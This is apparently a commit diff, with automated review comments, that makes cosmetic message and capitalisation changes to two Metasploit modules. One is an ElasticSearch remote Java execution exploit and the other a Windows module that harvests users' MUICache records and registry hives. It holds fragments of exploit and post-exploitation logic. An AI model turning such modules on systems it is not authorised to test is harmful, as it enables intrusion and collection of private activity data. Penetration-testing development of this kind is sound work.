Make print/descs/case consistent

bug/bundler_fix
Tod Beardsley 2014-06-02 13:20:01 -05:00
parent b7dc89f569
commit ea383b4139
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
2 changed files with 26 additions and 25 deletions


@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch, This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search REST API, which does not require authentication, where the search
function allows dynamic scripts execution, and can be used for remote attackers function allows dynamic scripts execution. It can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
}, },
@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
print_status("#{peer} - Trying to execute arbitrary Java..") print_status("#{peer} - Trying to execute arbitrary Java...")
unless vulnerable? unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end end
print_status("#{peer} - Asking remote OS...") print_status("#{peer} - Discovering remote OS...")
res = execute(java_os) res = execute(java_os)
result = parse_result(res) result = parse_result(res)
if result.nil? if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
else else
print_good("#{peer} - OS #{result} found") # TODO: It'd be nice to report_host() with this info.
print_good("#{peer} - Remote OS is '#{result}' ")
end end
jar_file = "" jar_file = ""
if result =~ /win/i if result =~ /win/i
print_status("#{peer} - Asking TEMP path") print_status("#{peer} - Discovering TEMP path")
res = execute(java_tmp_dir) res = execute(java_tmp_dir)
result = parse_result(res) result = parse_result(res)
if result.nil? if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
else else
print_good("#{peer} - TEMP path found on #{result}") print_good("#{peer} - TEMP path identified: '#{result}' ")
end end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else else
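Review bot: The two rewritten `print_good` messages in `exploit` ("Remote OS is" and "TEMP path identified") end with a stray space between the closing single quote and the closing double quote, which becomes trailing whitespace in console output and logs. I would write `print_good("#{peer} - Remote OS is '#{result}'")` and `print_good("#{peer} - TEMP path identified: '#{result}'")`. `result` is taken from `parse_result(res)`, i.e. from the remote server's response, and `parse_result` is not visible in this hunk. If it does not already strip non-printable characters, printing `result.inspect` instead of hand-quoting would keep control characters out of the operator's terminal. The body of `exploit` continues past the end of the hunk.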


@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post
'Description' => 'Description' =>
%q{ %q{
This module gathers information about the files and file paths that logged on users have This module gathers information about the files and file paths that logged on users have
executed on the system. It also will check if the file exists on the system still. This executed on the system. It also will check if the file still exists on the system. This
information is gathered by using information stored under the MUICache registry key. If information is gathered by using information stored under the MUICache registry key. If
the user is logged in when the module is executed it will collect the MUICache entries the user is logged in when the module is executed it will collect the MUICache entries
by accessing the registry directly. If the user is not logged in the module will download by accessing the registry directly. If the user is not logged in the module will download
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
profile_subkeys = registry_enumkeys(username_reg_path) profile_subkeys = registry_enumkeys(username_reg_path)
if profile_subkeys.blank? if profile_subkeys.blank?
print_error("Unable to access ProfileList registry key. Can't continue.") print_error("Unable to access ProfileList registry key. Unable to continue.")
return nil return nil
end end
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
end end
user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
if user_home_path.blank? if user_home_path.blank?
print_error("Unable to read ProfileImagePath from the registry. Can't continue.") print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
return nil return nil
end end
full_path = user_home_path.strip full_path = user_home_path.strip
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post
# If the registry_enumvals returns us nothing then we'll know # If the registry_enumvals returns us nothing then we'll know
# that the user is most likely not logged in and we'll need to # that the user is most likely not logged in and we'll need to
# download and process users hive locally. # download and process users hive locally.
print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
result = process_hive(sys_path, user, muicache, hive_file) result = process_hive(sys_path, user, muicache, hive_file)
unless result.nil? unless result.nil?
result.each { |r| result.each { |r|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
# If the registry_enumvals returns us content we'll know that we # If the registry_enumvals returns us content we'll know that we
# can access the registry directly and thus continue to process # can access the registry directly and thus continue to process
# the content collected from there. # the content collected from there.
print_status("User #{user}: Enumerating registry..") print_status("User #{user}: Enumerating registry...")
subkeys.each do |key| subkeys.each do |key|
if key[0] != "@" && key != "LangID" && !key.nil? if key[0] != "@" && key != "LangID" && !key.nil?
result = check_file_exists(key, user) result = check_file_exists(key, user)
@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post
ntuser_status = file_exist?(hive_path) ntuser_status = file_exist?(hive_path)
unless ntuser_status == true unless ntuser_status == true
print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.")
return nil return nil
end end
print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy = Rex::Quickfile.new("jtrtmp")
local_hive_copy.close local_hive_copy.close
begin begin
@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
# extracting the contents of the MUICache registry key. # extracting the contents of the MUICache registry key.
def hive_parser(local_hive_copy, muicache, user) def hive_parser(local_hive_copy, muicache, user)
results = [] results = []
print_status("Parsing registry content..") print_status("Parsing registry content...")
err_msg = "Error parsing hive. Can't continue." err_msg = "Error parsing hive. Unable to continue."
hive = Rex::Registry::Hive.new(local_hive_copy) hive = Rex::Registry::Hive.new(local_hive_copy)
if hive.nil? if hive.nil?
print_error(err_msg) print_error(err_msg)
@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post
# - http://forensicartifacts.com/2010/08/registry-muicache/ # - http://forensicartifacts.com/2010/08/registry-muicache/
# - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
def run def run
print_status("Starting to enumerate MuiCache registry keys..") print_status("Starting to enumerate MUICache registry keys...")
sys_info = sysinfo['OS'] sys_info = sysinfo['OS']
if sys_info =~/Windows XP/ && is_admin? if sys_info =~/Windows XP/ && is_admin?
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post
hive_file = "\\NTUSER.DAT" hive_file = "\\NTUSER.DAT"
elsif sys_info =~/Windows 7/ && is_admin? elsif sys_info =~/Windows 7/ && is_admin?
print_good("Remote system supported: #{sys_info}") print_good("Remote system supported: #{sys_info}")
muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
else else
print_error("Unsupported OS or not enough privileges. Unable to continue.") print_error("Unsupported OS or not enough privileges. Unable to continue.")
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post
"File status", "File status",
]) ])
print_status("Phase 1: Searching user names..") print_status("Phase 1: Searching user names...")
sys_users, sys_paths, sys_sids = find_user_names sys_users, sys_paths, sys_sids = find_user_names
if sys_users.blank? if sys_users.blank?
@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post
print_good("Users found: #{sys_users.join(", ")}") print_good("Users found: #{sys_users.join(", ")}")
end end
print_status("Phase 2: Searching registry hives..") print_status("Phase 2: Searching registry hives...")
muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
results.each { |r| table << r } results.each { |r| table << r }
print_status("Phase 3: Processing results..") print_status("Phase 3: Processing results...")
loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
print_line("\n" + table.to_s + "\n") print_line("\n" + table.to_s + "\n")
print_status("Results stored in: #{loot}") print_status("Results stored as: #{loot}")
print_status("Execution finished.") print_status("Execution finished.")
end end
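Review bot: The Windows 7 branch of `run` changes the `muicache` path literal from `...\\Shell\\MuiCache` to `...\\Shell\\MUICache`, which is a runtime value rather than a message, unlike every other line in this commit. Live registry lookups on Windows are case-insensitive, but the same string is also passed to `process_hive` and `hive_parser`, where it is presumably matched against a downloaded hive through `Rex::Registry::Hive`. Whether that lookup ignores case is not visible here and should be confirmed. The Windows XP branch's `muicache` value lies outside the hunk, so check that both branches still agree. If the case change is purely cosmetic I would keep the literal ending in `\\Shell\\MuiCache` and limit the capitalisation change to the user-facing strings.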